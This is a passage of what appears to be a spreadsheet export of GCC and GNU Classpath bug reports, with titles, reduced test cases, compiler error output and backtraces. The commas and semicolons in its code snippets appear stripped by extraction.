date_time_format_parser.ii:42:33:   required from â€˜void parse_format(CharT* ParserT CallbackT) [with CharT = const wchar_t ParserT = D CallbackT = date_time_format_parser_callback]â€™
date_time_format_parser.ii:50:16:   required from â€˜void parse_date_time_format(const CharT* const CharT* date_time_format_parser_callback&amp;) [with CharT = wchar_t]â€™
date_time_format_parser.ii:54:68:   required from here
date_time_format_parser.ii:17:16: internal compiler error: canonical types differ for identical types A::type and const char_type [3] {aka A::type}
     as_literal (on_full_year_placeholder)
                ^
0x6b6ebe comptypes(tree_node* tree_node* int)
        ../../gcc/gcc/cp/typeck.c:1407
0x6b4ffd structural_comptypes
        ../../gcc/gcc/cp/typeck.c:1341
0x6b6e77 comptypes(tree_node* tree_node* int)
        ../../gcc/gcc/cp/typeck.c:1399
0x6d1c51 ocp_convert(tree_node* tree_node* int int int)
        ../../gcc/gcc/cp/cvt.c:686
0x57baf8 convert_like_real
        ../../gcc/gcc/cp/call.c:6471
0x57832c build_over_call
        ../../gcc/gcc/cp/call.c:7209
0x587911 build_new_function_call(tree_node* vec** bool int)
        ../../gcc/gcc/cp/call.c:4072
0x7060b4 finish_call_expr(tree_node* vec** bool bool int)
        ../../gcc/gcc/cp/semantics.c:2366
0x5fb7c6 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc/gcc/cp/pt.c:15095
0x5db9d6 tsubst_expr
        ../../gcc/gcc/cp/pt.c:14272
0x5dbb1f tsubst_expr
        ../../gcc/gcc/cp/pt.c:13683
0x5db34b tsubst_expr
        ../../gcc/gcc/cp/pt.c:13669
0x5dc7e0 tsubst_expr
        ../../gcc/gcc/cp/pt.c:13855
0x5d9a7d instantiate_decl(tree_node* int bool)
        ../../gcc/gcc/cp/pt.c:20231
0x620192 instantiate_pending_templates(int)
        ../../gcc/gcc/cp/pt.c:20347
0x65d4d4 cp_write_global_declarations()
        ../../gcc/gcc/cp/decl2.c:4367
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>CLASSPATH-25837</t>
  </si>
  <si>
    <t>gnu.regexp: Difference in the capturing operation</t>
  </si>
  <si>
    <t>Test program:
$ cat W.java
import java.util.regex.*
public class W {
  public static void main(String[] args) throws Exception {
    int flags = 0
    if (System.getProperty(CASE_INSENSITIVE) != null) {
      flags |= Pattern.CASE_INSENSITIVE
    }
    Pattern p = Pattern.compile(args[1] flags)
    Matcher m = p.matcher(args[0])
    boolean b = m.matches()
    System.out.println(b)
    if (b) {
      int groups = m.groupCount()
      for (int i = 0 i &lt;= groups i++) {
        System.out.println(G + i +  =  + m.group(i))
      }
    }
  }
}
Test case (taken from Mauve gnu/testlet/java/util/regex/Pattern/testdata2):
$ java W 'bbbc' '^(b+|a){12}c'
true
G0 = bbbc
G1 = b
Expected results:
Sun's JDK:
$ java W 'bbbc' '^(b+|a){12}c'
true
G0 = bbbc
G1 = bbb
Perl:
$ perl -e 'if (bbbc =~ /^(b+|a){12}c/) {print $ print $1.\n}'
bbbc
bbb
Mauve gnu/testlet/java/util/regex/Pattern/testdata2:
    bbbc
 0: bbbc
 1: bb
(I think this expected result of Mauve is wrong.)
bbbc and ^(b+|a){12}c can match in several ways. Which is most
desirable?
gnu.regexp:
  bb : (b+|a)
  b  : (b+|a)
  c  : c
Sun's JDK and Perl
  bbb : (b+|a)
  c   : c</t>
  </si>
  <si>
    <t>GCC-80381</t>
  </si>
  <si>
    <t>AVX512: -O3 _mm512_srai_epi32 the last argument must be an 8-bit immediate</t>
  </si>
  <si>
    <t>I again reduced the issue we ran into this time I have a reproducer that fails when compiling with -O3.
Code:
---------
#include 
#define __forceinline inline __attribute__((always_inline))
struct vint16
{
  __forceinline vint16(const int i) 
    : v(_mm512_set1_epi32(i)) {}
  __forceinline vint16(const __m512i&amp; t) 
    : v(t) {}
  friend __forceinline const vint16 operator &gt;&gt;( const vint16&amp; a const int n ) { 
    return _mm512_srai_epi32(a.v n) 
  }
  __m512i v 
}
vint16 test16(int shift)
{
  const vint16 blocks_add = shift
  return blocks_add &gt;&gt; shift
}
Command line:
--------------
g++ -mavx512f -mavx512dq -mavx512cd -mavx512bw -mavx512vl -mf16c -mavx2 -mfma -mlzcnt -mbmi -mbmi2 -O3 test.cpp -c -o test.o
Output:
-------
/home/swoop/projects/gcc/latest/usr/local/lib/gcc/x86_64-pc-linux-gnu/7.0.1/include/avx512fintrin.h: In function \u2018vint16 test16(int)\u2019:
/home/swoop/projects/gcc/latest/usr/local/lib/gcc/x86_64-pc-linux-gnu/7.0.1/include/avx512fintrin.h:1318:50: error: the last argument must be an 8-bit immediate
   return (__m512i) __builtin_ia32_psradi512_mask ((__v16si) __A __B
                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~
         (__v16si)
         ~~~~~~~~~                                 
         _mm512_undefined_epi32 ()
         ~~~~~~~~~~~~~~~~~~~~~~~~~~                
         (__mmask16) -1)</t>
  </si>
  <si>
    <t>GCC-27724</t>
  </si>
  <si>
    <t>[4.1 Regression] internal compiler error: no-op convert from 4 to 8 bytes in initializer</t>
  </si>
  <si>
    <t>I agree the code is ugly... )
But it shouldn't cause an ICE anyway</t>
  </si>
  <si>
    <t>GCC-69297</t>
  </si>
  <si>
    <t>[6 Regression] Performance regression after r230020</t>
  </si>
  <si>
    <t>This regression was found on spec2006/464.h264ref. The problem is related to SLP vectorization of BB's and caused by the wrong calculation of scalar cost e.g. for attached test-case:
  Cost model analysis: 
  Vector inside of basic block cost: 188
  Vector prologue cost: 0
  Vector epilogue cost: 0
  Scalar cost of basic block: 512
although the basic block contains only 96 statements.
I found out that vect_bb_slp_scalar_cost takes into account the same stmt several times and results in non-profitable SLP vectorization.</t>
  </si>
  <si>
    <t>GCC-8878</t>
  </si>
  <si>
    <t>[3.3 only] miscompilation with -O and SSE</t>
  </si>
  <si>
    <t>gcc produce wrong assembly when using vector instructions through built-in 
functions and -O. I was benchmarking pure FPU vs. SSE so the program is a
loop that multiply and add 2 vector.
Release:
3.2.1
Environment:
System: Linux dreamland 2.4.20-rc3-xfs-acpi #9 Wed Nov 27 18:01:32 CET 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr --enable-shared --with-slibdir=/lib --with-gnu-as --with-gnu-ld --enable-threads --enable-languages=cc++
How-To-Repeat:
#include 
int main(void) {
	typedef int v4sf __attribute__ ((mode(V4SF)))
	v4sf a = {2.0 2.0 2.0 2.0} 
	v4sf b = {1.0 2.0 3.0 4.0}
	v4sf c = {0.0 0.0 0.0 0.0}
	v4sf d
	int i
	for(i = 0 i &lt; 1000000 i++) {
		d = __builtin_ia32_mulps(a b)
		c = __builtin_ia32_addps(c d)
	}
	for (i = 0 i &lt; 4 i++)
		printf(%f  *(((float *)(
	printf(\n)
	return 0
}
Compiled with: gcc -Wall -ofloat-sse -march=athlon-xp float-sse.c it
gives me the following (correct) output:
kronos:~/c$ float-sse
2000000.000000 4000000.000000 6000000.000000 8000000.000000
Compiled with: gcc -O -Wall -ofloat-sse -march=athlon-xp float-sse.c it
gives a wrong output:
kronos:~/c$ float-sse
8000000.000000 0.000000 0.000000 0.000000
Assembly output available if needed.</t>
  </si>
  <si>
    <t>kronoz</t>
  </si>
  <si>
    <t>GCC-50816</t>
  </si>
  <si>
    <t>[4.6.1] Discriminators are emitted in DWARF 2 format</t>
  </si>
  <si>
    <t>Created attachment 25566
testcase to reproduce the bug
GCC 4.6.1 emits discriminators even in dwarf2 format. For e.g
$avr-gcc test.c -gstrict-dwarf -S -mmcu=atxmega128a1 -g -gdwarf-2
It gives the following assembly:
delay_ms:
.LFB0:
    .file 1 test.c
    .loc 1 3 0
    push r28
...
.L5:
    .loc 1 9 0
    std Y+3__zero_reg__
    std Y+4__zero_reg__
    rjmp .L3
.L4:
    .loc 1 9 0 is_stmt 0 discriminator 2
    ldd r24Y+3
    ldd r25Y+4
...
Version: 
$ avr-gcc -v
Using built-in specs.
COLLECT_GCC=c:\Program Files\Atmel\AVR Tools\AVR Toolchain\avr8-gnu-toolchain-de
v-win32_x86\bin\avr-gcc.exe
COLLECT_LTO_WRAPPER=c:/program files/atmel/avr tools/avr toolchain/avr8-gnu-tool
chain-dev-win32_x86/bin/../libexec/gcc/avr/4.6.1/lto-wrapper.exe
Target: avr
...
Thread model: single
gcc version 4.6.1</t>
  </si>
  <si>
    <t>anitha.boyapati</t>
  </si>
  <si>
    <t>GCC-34016</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in execute_todo with -ftree-loop-linear for 454.calculix</t>
  </si>
  <si>
    <t>Test 454.calculix from SPEC CPU2006 fails to build on powerpc-linux using -O2 -ftree-loop-linear with an ICE in execute_todo at passes.c:983.  This minimized test case demonstrates the problem:
      subroutine bug()
      implicit none
      integer ij
      real*8 gr(66)
      do i=16
         do j=16
            gr(ij)=0.d0
         enddo
         if(i.le.3) then
            gr(ii)=1.d0
         endif
      enddo
      call foo(gr)
      return
      end
The failure starts with:
    http://gcc.gnu.org/viewcvs?view=rev&amp;rev=129494
    r129494 | spop | 2007-10-19 19:01:58 +0000 (Fri 19 Oct 2007)</t>
  </si>
  <si>
    <t>GCC-42397</t>
  </si>
  <si>
    <t>FAIL: gfortran.dg/lto/20091028-2 f_lto_20091028-2_0.o-f_lto_20091028-2_1.o link internal compiler error</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gnu/gcc-4.5/objdir/gcc/testsuite/gfortran/../../gfortran -B/home/dave/gnu/gcc-4.5/objdir/gcc/testsuite/gfortran/../../ f_lto_20091028-2_0.o f_lto_20091028-2_1.o  -O2 -fwhopr -r -nostdlib -finline-functions  -B/home/dave/gnu/gcc-4.5/objdir/hppa-linux/./libgfortran/.libs -L/home/dave/gnu/gcc-4.5/objdir/hppa-linux/./libgfortran/.libs -L/home/dave/gnu/gcc-4.5/objdir/hppa-linux/./libgfortran/.libs -L/home/dave/gnu/gcc-4.5/objdir/hppa-linux/./libiberty      -o gfortran-dg-lto-20091028-2-11    (timeout = 300)In file included from /home/dave/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/lto/20091028-2_0.f90:4:0                 from :2:/home/dave/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/lto/20091028-2_1.c: In function 'int_gen_ti_header_char':/home/dave/gnu/gcc/gcc/gcc/testsuite/gfortran.dg/lto/20091028-2_1.c:8:10: internal compiler error: Floating point exceptionPlease submit a full bug reportwith preprocessed source if appropriate.See  for instructions.lto1: fatal error: /home/dave/gnu/gcc-4.5/objdir/gcc/testsuite/gfortran/../../gfortran terminated with status 256compilation terminated.lto-wrapper: /home/dave/gnu/gcc-4.5/objdir/gcc/testsuite/gfortran/../../gfortran returned 1 exit status
dave@hiauly6:~/gnu/gcc/objdir/gcc$ ./xgcc -b./ -v
Using built-in specs.
COLLECT_GCC=./xgcc
xgcc: unrecognized option '-b./'
Target: hppa-linux
Configured with: ../gcc/configure --with-gnu-as --with-gnu-ld --enable-shared --prefix=/home/dave/opt/gnu/gcc/gcc-4.5.0 --with-local-prefix=/home/dave/opt/gnu --enable-threads=posix --enable-__cxa_atexit --build=hppa-linux --enable-clocale=gnu --enable-java-gc=boehm --enable-java-awt=xlib --enable-languages=cc++objcfortranobj-c++javaada --with-libelf=/home/dave/opt/gnu
Thread model: posix
gcc version 4.5.0 20091215 (experimental) [trunk revision 155276] (GCC)</t>
  </si>
  <si>
    <t>GCC-68835</t>
  </si>
  <si>
    <t>[5 Regression] ICE in set_value_range at tree-vrp.c:387 with __int128 bit field</t>
  </si>
  <si>
    <t>tst.c:
unsigned __int128
foo (unsigned long a unsigned long b)
{
  unsigned __int128 x = (unsigned __int128) a * b
  struct { unsigned __int128 a: 96 } w
  w.a = x
  return w.a
}
$ gcc -O2 -c -o tst.o tst.c
tst.c: In function â€˜fooâ€™:
tst.c:2:1: internal compiler error: in set_value_range at tree-vrp.c:387
 foo (unsigned long a unsigned long b)
 ^~~
0xd94363 set_value_range
	/home/arnez/gtools/gcc/gcc/tree-vrp.c:387
0xda878d set_value_range_to_nonnegative
	/home/arnez/gtools/gcc/gcc/tree-vrp.c:586
0xda878d extract_range_basic
	/home/arnez/gtools/gcc/gcc/tree-vrp.c:4110
0xda9e5a extract_range_from_assignment
	/home/arnez/gtools/gcc/gcc/tree-vrp.c:4154
0xdab5d8 vrp_visit_assignment_or_call
	/home/arnez/gtools/gcc/gcc/tree-vrp.c:7033
0xdabeba vrp_visit_stmt
	/home/arnez/gtools/gcc/gcc/tree-vrp.c:7913
0xcb3abd simulate_stmt
	/home/arnez/gtools/gcc/gcc/tree-ssa-propagate.c:331
0xcb4447 simulate_block
	/home/arnez/gtools/gcc/gcc/tree-ssa-propagate.c:509
0xcb4447 ssa_propagate(ssa_prop_result (*)(gimple* edge_def** tree_node**) ssa_prop_result (*)(gphi*))
	/home/arnez/gtools/gcc/gcc/tree-ssa-propagate.c:926
0xda07e7 execute_vrp
	/home/arnez/gtools/gcc/gcc/tree-vrp.c:10319
0xda07e7 execute
	/home/arnez/gtools/gcc/gcc/tree-vrp.c:10405</t>
  </si>
  <si>
    <t>arnez</t>
  </si>
  <si>
    <t>GCC-35816</t>
  </si>
  <si>
    <t>libstdc++ build during bootstrap is optimizing away atomic builtin check</t>
  </si>
  <si>
    <t>When compiling a combined gcc + g++ + binutils the configure script for the libstdc++ library is using the host g++ rather than the last stage g++ for determining atomic builtin support status.
While I probably need to compile the toolchain with CXXFLAGS=-march=i486 from what I've read to enable support for atomic builtins in the compiler I did not.  This resulted in a target g++ that did not support atomic builtins and a libstdc++ that expected the compiler did because it got the value from checking the host g++ rather than the final bootstrap stage g++.
The configure parameters were:
  --prefix=/$(TOOLS_DIR)/usr \
  --with-sysroot=/$(TOOLS_DIR) \
  --with-pic \
  --enable-shared \
  --enable-clocale=gnu \
  --enable-threads=posix \
  --enable-__cxa_atexit \
  --enable-languages=cc++ \
  --enable-checking=release \
  --disable-werror \
  --enable-stage1-checking \
  --enable-bootstrap</t>
  </si>
  <si>
    <t>oblivian</t>
  </si>
  <si>
    <t>GCC-16919</t>
  </si>
  <si>
    <t>ICE with derived type and array constructor</t>
  </si>
  <si>
    <t>Derived type constructors containing array constructors don't work: 
program myprog 
  integer i 
  type t 
    integer dimension(5) :: a 
  end type 
  type (t) :: v 
  v = t((/1 2 3 4 5/)) 
  v = t((/(i i=15)/)) 
end program 
Gives: 
trans-expr.c:1365: gfc_conv_array_constructor_expr: Assertion `se-&gt;ss != 
((void *)0) &amp;&amp; se-&gt;ss != gfc_ss_terminator' failed.</t>
  </si>
  <si>
    <t>GCC-51443</t>
  </si>
  <si>
    <t>[trans-mem] internal compiler error in expand_block_tm of trans-mem.c</t>
  </si>
  <si>
    <t>Created attachment 26011
testcase with -gnu-tm -O1
I report this bug which is very close to some previous one (PR46269/PR47606).
In this testcase it fails to detect the block as irrevocable due to the asm and thus failed in expand_block_tm. Actually the way to mark a block irrevocable in a transaction_callable is a bit obscure to me.
Thanks.
Patrick Marlier.</t>
  </si>
  <si>
    <t>GCC-79073</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/pr78973.c  (test for warnings line 12) in ILP32</t>
  </si>
  <si>
    <t>As noted in pr78775 comment 10 the pr78973.c test added in r244290 fails on ILP32 targets:
Running /src/gcc/git/gcc/testsuite/gcc.dg/dg.exp ...
FAIL: gcc.dg/pr78973.c  (test for warnings line 12)
		=== gcc Summary ===
# of expected passes		1
# of unexpected failures	1
/home/msebor/build/gcc-git/gcc/xgcc  version 7.0.0 20170112 (experimental) (GCC)
The failure seems to be due to the lack or range information for the last memset argument in ILP32.  The VRP details dump shows the range information is computed:
  SSA form after inserting ASSERT_EXPRs
   ...
    n_11 = ASSERT_EXPR 
    __builtin_memset (d_5(D) 0 n_11)
    ...
but then somehow not preserved for the n_3(D) argument:
  Value ranges after VRP:
  n_3(D): VARYING
  n_11: [2147483648 +INF]  EQUIVALENCES: { n_3(D) } (1 elements)
  ...
  __builtin_memset (d_5(D) 0 n_3(D))
This seems like a defect/limitation in GCC not one in the test so I'll open a separate bug for it and xfail the test until the defect is fixed.</t>
  </si>
  <si>
    <t>GCC-1520</t>
  </si>
  <si>
    <t>cout prints in the wrong order.</t>
  </si>
  <si>
    <t>The printout order is different between optimized and unoptimized code.
The optimized code seems correct.
(My code is wrong)
[root@back 21dayscpp]# g++ -Wall hello.cxx -ohello2
[root@back 21dayscpp]# ./hello2 
Hello World!
12 : 35Test
Enter value 1
6
Enter value 2
7
second: 6
first: 6
[root@back 21dayscpp]# g++ -Wall -O hello.cxx -ohello2
[root@back 21dayscpp]# ./hello2 
Hello World!
12 : 35Test
Enter value 1
6
Enter value 2
7
first: second: 6
6
Release:
2.96
Environment:
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux/2.96/specs
gcc version 2.96 20000731 (Linux-Mandrake 7.2)
How-To-Repeat:
This produces incorrect code:
g++ -Wall hello.cxx -ohello 
This produces correct code:
g++ -Wall -O hello.cxx -ohello</t>
  </si>
  <si>
    <t>magnus</t>
  </si>
  <si>
    <t>GCC-137</t>
  </si>
  <si>
    <t>Inconsistency in -Wconversion</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Tue 14 Mar 2000 14:03:43 -0800 (PST)
 Reply-To: Claus Fischer 
 Original-Message-ID: 
 Just FYI:
 One would expect the compiler to give the same kind of warnings
 for both function calls in the following program but it warns
 only for the call where the argument is instantiated with the
 array member. It probably shouldn't warn at all.
 Claus
 ************************************************
 cat x.c
     typedef enum { a } __attribute__((packed)) t
     void f(t x) {}
     int main(void)
     {
	 t x[2] y
	 f(x[0])
	 f(y)
	 return 0
     }
 EOF
 gcc -o x x.c -Wconversion
 ************************************************
 x.c: In function `main':
 x.c:6: warning: passing arg 1 of `f' with different width due to prototype
 -- 
 claus.fischer@intel.com   Intel Corporation SC12-205 ... not speaking
 phone   +1-408-765-6808   2200 Mission College Blvd.           for Intel
 fax     +1-408-765-9322   Santa Clara CA 95052-8119
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-23618</t>
  </si>
  <si>
    <t>GCC seems to generate line number information for the same line in two places</t>
  </si>
  <si>
    <t>When compiling a function with an empty body e.g.
  int MyFunc(void)
    {
    }
GCC seems to add line number information for the line containing the opening
bracket in two different places. 
Here is an example assembler output:
----
.globl MyFunc
        .type   MyFunc @function
MyFunc:
.LFB3:
        .loc 1 5 0
        pushl   %ebp
.LCFI0:
        movl    %esp %ebp
.LCFI1:
        .loc 1 5 0
        popl    %ebp
        ret
.LFE3:
----
Line number information for line 5 (the opening bracket) is seems to be added in
two places.</t>
  </si>
  <si>
    <t>tommi.hoynalanmaa</t>
  </si>
  <si>
    <t>GCC-56124</t>
  </si>
  <si>
    <t>Redundant reload for loading from memory</t>
  </si>
  <si>
    <t>For below test case:
typedef __builtin_va_list __gnuc_va_list
typedef __gnuc_va_list va_list
struct _reent
{
    int _stdout
}
struct _reent *_impure_ptr
int bar (struct _reent * int const char * va_list)
int
foo(const char *fmt  ...)
{
  int ret
  va_list ap
  struct _reent *ptr = _impure_ptr
  __builtin_va_start(apfmt)
  ret = bar (ptr ((ptr)-&gt;_stdout) fmt ap)
  __builtin_va_end(ap)
  return ret
}
The dump of reload pass is:
    1: NOTE_INSN_DELETED
    4: NOTE_INSN_BASIC_BLOCK 2
   28: r3:SI=sp:SI+0x10
      REG_EQUAL sp:SI+0x10
    2: r2:SI=[r3:SI++]
      REG_INC r3:SI
      REG_EQUIV [afp:SI]
   31: [sp:SI+0x10]=r2:SI
    3: NOTE_INSN_FUNCTION_BEG
    6: r2:SI=[`*.LC0']
      REG_EQUIV `_impure_ptr'
    7: r0:SI=[r2:SI]
    9: [sp:SI+0x4]=r3:SI
   10: r1:SI=[r0:SI]
   14: r2:SI=[sp:SI+0x10]
   16: r0:SI=call [`bar'] argc:0
   25: use r0:SI
   29: NOTE_INSN_DELETED
which could be:
    1: NOTE_INSN_DELETED
    4: NOTE_INSN_BASIC_BLOCK 2
   28: r3:SI=sp:SI+0x10
      REG_EQUAL sp:SI+0x10
    2: r2:SI=[r3:SI++]
      REG_INC r3:SI
      REG_EQUIV [afp:SI]
    3: NOTE_INSN_FUNCTION_BEG
    6: r1:SI=[`*.LC0']
      REG_EQUIV `_impure_ptr'
    7: r0:SI=[r1:SI]
    9: [sp:SI+0x4]=r3:SI
   10: r1:SI=[r0:SI]
   16: r0:SI=call [`bar'] argc:0
   25: use r0:SI
   29: NOTE_INSN_DELETED
It is obvious that insn 31/14 are generated/kept by redundant reload.
The command line is:
arm-none-eabi-gcc -mthumb -mcpu=cortex-m0 -Os ...</t>
  </si>
  <si>
    <t>GCC-18408</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE compiling code that involves casting classes</t>
  </si>
  <si>
    <t>This program causes an ICE in today's sources.</t>
  </si>
  <si>
    <t>mgd</t>
  </si>
  <si>
    <t>GCC-68583</t>
  </si>
  <si>
    <t>[5 Regression] Missed if-conversion</t>
  </si>
  <si>
    <t>We don't if-convert
void foo (long *a)
{
  int i
  for (i = 0 i &lt; 100 i+=2)
    {
      if (a[i] == 0)
        {
          a[i+1] = 2
          a[i] = 3
        }
      else
        {
          a[i+1] = 3
          a[i] = 4
        }
    }
}
even though both a[i] and a[i+1] are written to unconditionally.  We only
keep a base_master to see if sth is writable but if we'd have separate
read-unconditionally and write-unconditionally flags from the master_dr
we could handle the above just fine.  That would require the master_dr
entry to be associated with two different predicates one for
reads and writes (for read-or-written-unconditionally) and one for writes
only (for written-unconditionally).
PR56624 suggests this missed if-conversion is a regression which it is
as GCC 4.9 and GCC 5.1.0 happily if-convert it.</t>
  </si>
  <si>
    <t>GCC-83134</t>
  </si>
  <si>
    <t>std::negation uses !B::value instead of !bool(B::value)</t>
  </si>
  <si>
    <t>#include 
struct X {
  constexpr operator bool() const { return false }
  constexpr bool operator!() const = delete
}
struct Y {
  static constexpr X value{}
}
int main() {
  static_assert(std::negation::value)  
}
In file included from neg.cc:1:0:
/home/jwakely/gcc/8/include/c++/8.0.0/type_traits: In instantiation of â€˜struct std::__not_â€™:
/home/jwakely/gcc/8/include/c++/8.0.0/type_traits:172:12:   required from â€˜struct std::negationâ€™
neg.cc:13:33:   required from here
/home/jwakely/gcc/8/include/c++/8.0.0/type_traits:154:38: error: use of deleted function â€˜constexpr bool X::operator!() constâ€™
     : public integral_constant
                                      ^~~~
neg.cc:5:18: note: declared here
   constexpr bool operator!() const = delete
                  ^~~~~~~~
neg.cc: In function â€˜int main()â€™:
neg.cc:13:35: error: â€˜valueâ€™ is not a member of â€˜std::negationâ€™
   static_assert(std::negation::value)
                                   ^~~~~</t>
  </si>
  <si>
    <t>GCC-70851</t>
  </si>
  <si>
    <t>internal compiler error: in create_tmp_var at gimple-expr.c:473</t>
  </si>
  <si>
    <t>enum E e
void
foo (void)
{
  int a[e]
}
$ ./cc1 -quiet q.c
q.c:1:8: error: storage size of â€˜eâ€™ isnâ€™t known
 enum E e
        ^
q.c: In function â€˜fooâ€™:
q.c:6:3: internal compiler error: in create_tmp_var at gimple-expr.c:473
   int a[e]
   ^~~
0xacc7a2 create_tmp_var(tree_node* char const*)
	/home/marek/src/gcc/gcc/gimple-expr.c:473
0xaf6efc create_tmp_from_val
	/home/marek/src/gcc/gcc/gimplify.c:498
0xaf7006 lookup_tmp_var
	/home/marek/src/gcc/gcc/gimplify.c:519
0xaf71ee internal_get_tmp_var
	/home/marek/src/gcc/gcc/gimplify.c:563
0xaf73f6 get_initialized_tmp_var(tree_node* gimple** gimple**)
	/home/marek/src/gcc/gcc/gimplify.c:600
0xb0739c gimplify_save_expr
	/home/marek/src/gcc/gcc/gimplify.c:4997
0xb20961 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	/home/marek/src/gcc/gcc/gimplify.c:10575
0xb09cfd gimplify_stmt(tree_node** gimple**)
	/home/marek/src/gcc/gcc/gimplify.c:5688
0xafa38b gimplify_statement_list
	/home/marek/src/gcc/gcc/gimplify.c:1537
0xb2135d gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	/home/marek/src/gcc/gcc/gimplify.c:10704
0xb09cfd gimplify_stmt(tree_node** gimple**)
	/home/marek/src/gcc/gcc/gimplify.c:5688
0xaf8cf5 gimplify_bind_expr
	/home/marek/src/gcc/gcc/gimplify.c:1142
0xb204a6 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	/home/marek/src/gcc/gcc/gimplify.c:10486
0xb09cfd gimplify_stmt(tree_node** gimple**)
	/home/marek/src/gcc/gcc/gimplify.c:5688
0xb23973 gimplify_body(tree_node* bool)
	/home/marek/src/gcc/gcc/gimplify.c:11433
0xb2420f gimplify_function_tree(tree_node*)
	/home/marek/src/gcc/gcc/gimplify.c:11589
0x92cc55 cgraph_node::analyze()
	/home/marek/src/gcc/gcc/cgraphunit.c:625
0x92e4dc analyze_functions
	/home/marek/src/gcc/gcc/cgraphunit.c:1086
0x932ae8 symbol_table::finalize_compilation_unit()
	/home/marek/src/gcc/gcc/cgraphunit.c:2542
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-9197</t>
  </si>
  <si>
    <t>Re: mips-irix6 testsuite failure in gcc.c-torture/compile/simd-5.c</t>
  </si>
  <si>
    <t xml:space="preserve"> Not that I don't appreciate the bug report but I didn't think we filed
 bugs against non-regression testsuite failures? I reserve the right to
 be wrong here though :)
 -eric
 On Mon 2003-01-06 at 10:00 ghazi@caip.rutgers.edu wrote:
 &gt; &gt;Category:       target
 &gt; &gt;Synopsis:       mips-irix6 testsuite failure in gcc.c-torture/compile/simd-5.c with -O1
 &gt; &gt;Confidential:   no
 &gt; &gt;Severity:       serious
 &gt; &gt;Priority:       medium
 &gt; &gt;Class:          ice-on-legal-code
 &gt; &gt;Submitter-Id:   net
 &gt; &gt;Originator:     Kaveh Ghazi
 &gt; &gt;Release:        gcc version 3.4 20030105 (experimental)
 &gt; &gt;Environment:
 &gt; mips-sgi-irix6.5
 &gt; &gt;Description:
 &gt; I get a testsuite failure in gcc.c-torture/compile/simd-5.c with -O1 as seen here:  http://gcc.gnu.org/ml/gcc-testresults/2003-01/msg00233.html
 &gt; 
 &gt; This is not new it appears to have been a problem for as long as the testcase was in the suite.
 &gt; 
 &gt; The logfile says:
 &gt; simd-5.c: In function `main':
 &gt; simd-5.c:12: internal compiler error: in trunc_int_for_mode at explow.c:56
 &gt; FAIL: gcc.c-torture/compile/simd-5.c  -O1
 &gt; 
 &gt; running under gdb shows:
 &gt; 
 &gt; Breakpoint 1 trunc_int_for_mode (c=64 mode=V2SImode) at ../../egcc-CVS20030105/gcc/explow.c:56
 &gt; 56          abort ()
 &gt; (gdb) bt
 &gt; #0  trunc_int_for_mode (c=64 mode=V2SImode) at ../../egcc-CVS20030105/gcc/explow.c:56
 &gt; #1  0x102e4fd8 in simplify_unary_operation (code=131 mode=V2SImode op=0x4008400 op_mode=SImode)
 &gt;     at ../../egcc-CVS20030105/gcc/simplify-rtx.c:485
 &gt; #2  0x1033eed0 in subst (x=0x400b730 from=0x403b330 to=0x40088a0 in_dest=0 unique_copy=0)
 &gt;     at ../../egcc-CVS20030105/gcc/combine.c:3556
 &gt; #3  0x1033ed44 in subst (x=0x4052478 from=0x403b330 to=0x40088a0 in_dest=0 unique_copy=0)
 &gt;     at ../../egcc-CVS20030105/gcc/combine.c:3526
 &gt; #4  0x1032eff4 in try_combine (i3=0x4015290 i2=0x4014840 i1=0x4016998 new_direct_jump_p=0x7fff2710)
 &gt;     at ../../egcc-CVS20030105/gcc/combine.c:1987
 &gt; #5  0x1032afa0 in combine_instructions (f=0x40144d0 nregs=67444248) at ../../egcc-CVS20030105/gcc/combine.c:719
 &gt; #6  0x100bdda4 in rest_of_compilation (decl=0x404e080) at ../../egcc-CVS20030105/gcc/toplev.c:3119
 &gt; #7  0x1005628c in c_expand_body (fndecl=0x404e080 nested_p=0 can_defer_p=30) at ../../egcc-CVS20030105/gcc/c-decl.c:6539
 &gt; #8  0x10055da0 in finish_function (nested=0 can_defer_p=1) at ../../egcc-CVS20030105/gcc/c-decl.c:6410
 &gt; #9  0x10030b60 in yyparse () at c-parse.y:433
 &gt; #10 0x1003fe60 in c_common_parse_file (set_yydebug=200) at ../../egcc-CVS20030105/gcc/c-lex.c:161
 &gt; #11 0x100bc100 in compile_file () at ../../egcc-CVS20030105/gcc/toplev.c:2128
 &gt; #12 0x100c3860 in do_compile () at ../../egcc-CVS20030105/gcc/toplev.c:5352
 &gt; #13 0x100c3990 in toplev_main (argc=13 argv=0x7fff2ef4) at ../../egcc-CVS20030105/gcc/toplev.c:5382
 &gt; #14 0x100aa77c in main (argc=200 argv=0x40) at ../../egcc-CVS20030105/gcc/main.c:37
 &gt; (gdb) p mode
 &gt; $1 = V2SImode
 &gt; &gt;How-To-Repeat:
 &gt; Target mips-sgi-irix6.5 and compile simd-5.i with:
 &gt; 
 &gt; cc1 -fpreprocessed simd-5.i -quiet -dumpbase simd-5.c -auxbase-strip /caip/u58/ghazi/gcc-testing/build/gcc/testsuite/simd-5.o -O1 -w -version -o simd-5.s
 &gt; 
 &gt; # 1 /caip/u58/ghazi/gcc-testing/egcc-CVS20030105/gcc/testsuite/gcc.c-torture/compile/simd-5.c
 &gt; # 1 
 &gt; # 1 
 &gt; # 1 /caip/u58/ghazi/gcc-testing/egcc-CVS20030105/gcc/testsuite/gcc.c-torture/compile/simd-5.c
 &gt; 
 &gt; 
 &gt; main(){
 &gt; 
